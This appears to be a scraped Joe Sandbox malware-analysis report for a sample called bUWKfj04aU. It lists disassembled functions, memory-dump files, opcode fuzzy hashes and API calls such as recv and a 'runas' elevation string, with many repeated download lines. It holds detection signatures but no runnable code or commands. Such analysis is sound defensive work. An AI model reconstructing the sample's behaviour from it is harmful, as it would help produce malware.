Associated: 00000000.00000002.2152807504.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000B83000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000BB4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000BBC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000BCA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153054365.0000000000BCB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153173017.0000000000D60000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_bUWKfj04aU.jbxd

Yara matches

Similarity

API ID: Initialize
String ID: @3P
API String ID: 2538663250-282812438
Opcode ID: f3daff4ed2fabd83f2942e5406434283f019020fe96423f334f333ff76f4e1fb
Instruction ID: 9285f966b56358a551d8822dbbad1af20aed6547dbdf17a6fc77d2b741c69e75
Opcode Fuzzy Hash: f3daff4ed2fabd83f2942e5406434283f019020fe96423f334f333ff76f4e1fb
Instruction Fuzzy Hash: F9326671A102189BDB18CB28CC88BDDB7B5FF49308F5086D8E409E7291DB759E84CF91

Uniqueness

Uniqueness Score: -1.00%

Function 008C6B70 Relevance: 2.1, APIs: 1, Instructions: 551
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 008C6D13

Memory Dump Source

Source File: 00000000.00000002.2152679736.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2152554931.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152679736.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152777704.0000000000926000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000B83000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000BB4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000BBC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000BCA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153054365.0000000000BCB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153173017.0000000000D60000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_bUWKfj04aU.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: c8076ee284d06e163cf4b110382dd4aa37df924c0dcd1fe4646cec54cb2c3228
Instruction ID: 979631252da4f7fa87e4ebd694c6c6e26f6ca287b42607e9d327ceb7ff0f4c9f
Opcode Fuzzy Hash: c8076ee284d06e163cf4b110382dd4aa37df924c0dcd1fe4646cec54cb2c3228
Instruction Fuzzy Hash: FE121670E042189BDB24EB28DC4ABAD7771FB46314F94429DE815E73C1EB359E908B82

Uniqueness

Uniqueness Score: -1.00%

Function 008C7540 Relevance: 1.5, APIs: 1, Instructions: 14
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesA.KERNELBASE(?,008CC434), ref: 008C7549

Memory Dump Source

Source File: 00000000.00000002.2152679736.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2152554931.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152679736.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152777704.0000000000926000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000B83000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000BB4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000BBC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000BCA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153054365.0000000000BCB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153173017.0000000000D60000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_bUWKfj04aU.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 8d1be04d483882ea2ad60569300c4fbd8c0140e7923aacaf230fba4d5aa06b0a
Instruction ID: 3408a3c2dc692a07ec327115e460c80b92ce5123aa9ab068ef72b0276fa529e8
Opcode Fuzzy Hash: 8d1be04d483882ea2ad60569300c4fbd8c0140e7923aacaf230fba4d5aa06b0a
Instruction Fuzzy Hash: FCC08C3052AA009AEE1C4A3C518CA693330FE433A83F42BCCE075CB0E2C276D807DE20

Uniqueness

Uniqueness Score: -1.00%

Function 052A0AA9 Relevance: .7, Instructions: 654
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2155383297.00000000052A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_52a0000_bUWKfj04aU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e02083991527b61937575cd62e11ef8d70678d537ddcd870eb8838bff06074b
Instruction ID: 583aa6452e054c4614da4305dcc71856d5e6e838024f4cbd41e85523c17a63c4
Opcode Fuzzy Hash: 0e02083991527b61937575cd62e11ef8d70678d537ddcd870eb8838bff06074b
Instruction Fuzzy Hash: 2C012BA353D3819FD302C5214A5C9F57BA66DC332472544F7F045CB44BD385084DD232

Uniqueness

Uniqueness Score: -1.00%

Function 052A09C8 Relevance: .2, Instructions: 153
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2155383297.00000000052A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_52a0000_bUWKfj04aU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b67c8ba276519e3d2f86756b4ca499db426ffe8b1214ee30d4a66fd1a9574f1f
Instruction ID: 63ad1f8e093bf08b88bc57120246799bb0a839a94d8593dec33d8b7431b4cdce
Opcode Fuzzy Hash: b67c8ba276519e3d2f86756b4ca499db426ffe8b1214ee30d4a66fd1a9574f1f
Instruction Fuzzy Hash: 9331ABAB27D112AF7102C5816B9CAFA676EE9C6B303308427F503D6406E6D54E8E5071

Uniqueness

Uniqueness Score: -1.00%

Function 052A09EE Relevance: .1, Instructions: 84
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2155383297.00000000052A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_52a0000_bUWKfj04aU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9cb1456f345c8f6fdfc496c4b08d6cec8cacdab5bebc51f8d5a0071cb9197389
Instruction ID: b5341ccc687b493de7c2c8d232346d0acc28bb1b4b90f8b75d2a341c34e22c6d
Opcode Fuzzy Hash: 9cb1456f345c8f6fdfc496c4b08d6cec8cacdab5bebc51f8d5a0071cb9197389
Instruction Fuzzy Hash: DB018BAB17E115BF6202C9412B189BA6A6FE9C2B307308426FA07D6407E2D84E4E6131

Uniqueness

Uniqueness Score: -1.00%

Function 052A0A18 Relevance: .1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2155383297.00000000052A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_52a0000_bUWKfj04aU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9736ee78457a8d9e10d1f35488ee208b4a599afea3c9cecde1088c8a5174b9b
Instruction ID: 40b58a5bd3cb12bbde001f23d38a033cccea1b7704c81878ea15205f11802d2d
Opcode Fuzzy Hash: c9736ee78457a8d9e10d1f35488ee208b4a599afea3c9cecde1088c8a5174b9b
Instruction Fuzzy Hash: 5D0181AB17D111FF6102C8416B189BA776FEDC57307708427FA07C6406D3D94D895171

Uniqueness

Uniqueness Score: -1.00%

Function 052A0A29 Relevance: .1, Instructions: 58
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2155383297.00000000052A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_52a0000_bUWKfj04aU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b7abff3c9a4fc58535de49b2390a35382bcbfee71852113bd9fa2bad89d35172
Instruction ID: 81a1a35e0e312a11208acb8fb53be20c235c54146868caa88af2b3a51f240bf1
Opcode Fuzzy Hash: b7abff3c9a4fc58535de49b2390a35382bcbfee71852113bd9fa2bad89d35172
Instruction Fuzzy Hash: 00F0C2BB17D111FF6202C9426B1C9BA36AFEDC57307708467F607CA406D3E98989A172

Uniqueness

Uniqueness Score: -1.00%

Function 052A0A4E Relevance: .1, Instructions: 55
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2155383297.00000000052A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_52a0000_bUWKfj04aU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0bd24d15b0137efa450fded6ac8d113517e383786afcb496d8d530ea89611492
Instruction ID: cd594c7d7be665fd122c70fac69465d8d180c2feaff8144f1d1462f09da50f1a
Opcode Fuzzy Hash: 0bd24d15b0137efa450fded6ac8d113517e383786afcb496d8d530ea89611492
Instruction Fuzzy Hash: DF0149B707D190EFD242CA904E58AFA7B6AAF813307204417F547D6047C3A909889232

Uniqueness

Uniqueness Score: -1.00%

Function 052A0A38 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2155383297.00000000052A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_52a0000_bUWKfj04aU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b597ab23a2d80d4c67a3cf1775ff48b37d142df8459ed980588cd473204297b7
Instruction ID: 6e58c7471c7a73915d70d6d7cd84e44ac43107db1171bf7f91c754ba19f1c062
Opcode Fuzzy Hash: b597ab23a2d80d4c67a3cf1775ff48b37d142df8459ed980588cd473204297b7
Instruction Fuzzy Hash: BEF0F0B707D110FF6202C9812B0C9BA36AFEDC17307708413F607C6406D3E98D89A171

Uniqueness

Uniqueness Score: -1.00%

Function 052A0AC8 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2155383297.00000000052A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_52a0000_bUWKfj04aU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ba9a06721bf8955125521f2f051084daefb6153b95c9987c95c582f7ef85f93
Instruction ID: 928c319475c037a14c603a39183bc08330646cbcb9bd9a68d99d92e78946da6b
Opcode Fuzzy Hash: 7ba9a06721bf8955125521f2f051084daefb6153b95c9987c95c582f7ef85f93
Instruction Fuzzy Hash: 8FF0F0A717D110EF6606C9812B1CAF67B6FBDC17307708413F10789806C3A80999A271

Uniqueness

Uniqueness Score: -1.00%

Function 052A0A7A Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2155383297.00000000052A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_52a0000_bUWKfj04aU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5f53425709bbfff0f93c684bef07d94e61bff059602c55430cf5518b3554a05
Instruction ID: 49d76e7809c540073a4394707f8b75bb3da73e43740e27003612770823fbe76e
Opcode Fuzzy Hash: a5f53425709bbfff0f93c684bef07d94e61bff059602c55430cf5518b3554a05
Instruction Fuzzy Hash: 2DF0C27753C190EFA702CA415A9D9F67B7AED82324730888BF583DA406C39909999633

Uniqueness

Uniqueness Score: -1.00%

Function 052A0AF1 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2155383297.00000000052A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_52a0000_bUWKfj04aU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 728dbb8078fab1e1997d3db5bbc414651e376e464904bd1bbc52d5f65a462d88
Instruction ID: 11404b8122221f2e407c2836253757d6ff351f9480b90ce1d96bc960b55be87c
Opcode Fuzzy Hash: 728dbb8078fab1e1997d3db5bbc414651e376e464904bd1bbc52d5f65a462d88
Instruction Fuzzy Hash: 14F0206313D2A18B8743C8A0664C5F27B97AD823343308887E2838C80BD38E098EC233

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00902968 Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1340COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 00902AE3

Strings

1#INF, xrefs: 00903C9E
1#SNAN, xrefs: 00903C7A
1#IND, xrefs: 00903C73
1#QNAN, xrefs: 00903C81

Memory Dump Source

Source File: 00000000.00000002.2152679736.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2152554931.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152679736.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152777704.0000000000926000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000B83000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000BB4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000BBC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000BCA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153054365.0000000000BCB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153173017.0000000000D60000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_bUWKfj04aU.jbxd

Yara matches

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: e600ceb7a8d1bda726f97fae79d9d7439f56fea4cd60878218cc2df83db2e4c7
Instruction ID: 41e9b579d4874725a6592f38f541d021eba59d743acbf5a418180c06bdc863dc
Opcode Fuzzy Hash: e600ceb7a8d1bda726f97fae79d9d7439f56fea4cd60878218cc2df83db2e4c7
Instruction Fuzzy Hash: AAC22C71E046298FDB25CF28DD447E9B7B9EB48304F1485EAD84DE7280E779AE858F40

Uniqueness

Uniqueness Score: -1.00%

Function 008CC990 Relevance: 4.6, APIs: 3, Instructions: 102networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(?,?,00000004,00000000), ref: 008CC9DB
recv.WS2_32(?,?,00000008,00000000), ref: 008CCA10

Memory Dump Source

Source File: 00000000.00000002.2152679736.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2152554931.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152679736.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152777704.0000000000926000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000B83000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000BB4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000BBC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000BCA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153054365.0000000000BCB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153173017.0000000000D60000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_bUWKfj04aU.jbxd

Yara matches

Similarity

API ID: recv
String ID:
API String ID: 1507349165-0
Opcode ID: 8f517745c9d955567f09b272cd87f07c4e3b8b8039156d0f1f10ab7a68b8ac5c
Instruction ID: 2bfb3488bf8a92aa5db4c60d7e851abf95f1a9685a6b3fbdc5630fa54994c974
Opcode Fuzzy Hash: 8f517745c9d955567f09b272cd87f07c4e3b8b8039156d0f1f10ab7a68b8ac5c
Instruction Fuzzy Hash: F931E4719146189FD720DB68DC85FAEBBB8FB08764F41022AE528E7291D674AC458BA0

Uniqueness

Uniqueness Score: -1.00%

Function 009024D0 Relevance: 3.4, APIs: 2, Instructions: 450COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2152679736.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2152554931.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152679736.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152777704.0000000000926000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000B83000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000BB4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000BBC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000BCA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153054365.0000000000BCB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153173017.0000000000D60000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_bUWKfj04aU.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa2bd79df6c39be84dc92fe6f2f83e849779d540683633a56f5ad8c746343782
Instruction ID: faa0a949ee762e8b72d7bab84c93cc54faa8581fa068f3f92fda63a684f129ee
Opcode Fuzzy Hash: fa2bd79df6c39be84dc92fe6f2f83e849779d540683633a56f5ad8c746343782
Instruction Fuzzy Hash: 7FF14F71E002199FDF14CFA8C9946AEB7B5FF88314F25826AD819EB381D731AD41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 008C60E0 Relevance: 2.2, Strings: 1, Instructions: 901COMMON

Download Yara Rule

Strings

runas, xrefs: 008C6133

Memory Dump Source

Source File: 00000000.00000002.2152679736.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2152554931.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152679736.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152777704.0000000000926000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000B83000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000BB4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000BBC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000BCA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153054365.0000000000BCB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153173017.0000000000D60000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_bUWKfj04aU.jbxd

Yara matches

Similarity

API ID: ConditionVariableWake
String ID: runas
API String ID: 1192502693-4000483414
Opcode ID: d279f119a6270a00780fae7b9139a810b5a487fc18e7b5016583cabf216ca5fb
Instruction ID: e28062452e4a40715303a9be2297a5969ca15e547bbdae28b409bbcce0cbcbb4
Opcode Fuzzy Hash: d279f119a6270a00780fae7b9139a810b5a487fc18e7b5016583cabf216ca5fb
Instruction Fuzzy Hash: 5C52F571A10148ABDB08EF28CD86B9DBB76FB85314F50862DF801D73C5EB75DA908792

Uniqueness

Uniqueness Score: -1.00%

Function 008DC54A Relevance: 1.5, APIs: 1, Instructions: 16timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimePreciseAsFileTime.KERNEL32(?,008DC8B2,?,?,?,?,008DC8E7,?,?,?,?,?,?,008DBE5D,?,00000001), ref: 008DC563

Memory Dump Source

Source File: 00000000.00000002.2152679736.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2152554931.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152679736.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152777704.0000000000926000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000B83000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000BB4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000BBC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000BCA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153054365.0000000000BCB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153173017.0000000000D60000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_bUWKfj04aU.jbxd

Yara matches

Similarity

API ID: Time$FilePreciseSystem
String ID:
API String ID: 1802150274-0
Opcode ID: c7da482ed2b70cda0abbe19b342737d37a2baa54e1e2b55d4edbdbf81588ce7b
Instruction ID: b3465ee41e972b6238e8bbb2140d2c1a8be08619e21dd5aa7345c4a5b9db66d5
Opcode Fuzzy Hash: c7da482ed2b70cda0abbe19b342737d37a2baa54e1e2b55d4edbdbf81588ce7b
Instruction Fuzzy Hash: 4DD01236AE51399B89256B98BC148ADBB28FE05F64B050133ED0597A108A71AD00ABD5

Uniqueness

Uniqueness Score: -1.00%

Function 008F7780 Relevance: 1.5, Strings: 1, Instructions: 216COMMON

Download Yara Rule

Strings

0, xrefs: 008F78FC

Memory Dump Source

Source File: 00000000.00000002.2152679736.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2152554931.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152679736.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152777704.0000000000926000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000B83000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000BB4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000BBC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000BCA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153054365.0000000000BCB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153173017.0000000000D60000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_bUWKfj04aU.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
Instruction ID: 0e6513954295d83ace99ec2d56168c50d88cb6f4159d4ae0bba271cfe115b459
Opcode Fuzzy Hash: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
Instruction Fuzzy Hash: EB515B3072C64C5AFB38A93C8899BFE6B9AFB06344F18043ED782D7681DA559D44C35B

Uniqueness

Uniqueness Score: -1.00%

Function 00906809 Relevance: .3, Instructions: 275COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2152679736.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2152554931.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152679736.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152777704.0000000000926000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000B83000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000BB4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000BBC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000BCA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153054365.0000000000BCB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153173017.0000000000D60000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_bUWKfj04aU.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0d8195341e91300904a447fcf775b63e263ec94d3da6b9b6356bb9f2891f059
Instruction ID: fc6bb67f36e192690746744843c1c6ad5b16b3e67c362065de9cf4afbd7f7c46
Opcode Fuzzy Hash: f0d8195341e91300904a447fcf775b63e263ec94d3da6b9b6356bb9f2891f059
Instruction Fuzzy Hash: 7DB129716106098FDB19CF28C486B657BE0FF45364F258658E8EADF2E1C335E9A1CB40

Uniqueness

Uniqueness Score: -1.00%

Function 008DCD47 Relevance: .2, Instructions: 172COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 008C239E

Memory Dump Source

Source File: 00000000.00000002.2152679736.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2152554931.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152679736.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152777704.0000000000926000.00000004.00000001.01000000.00000003.sdmpDownload File
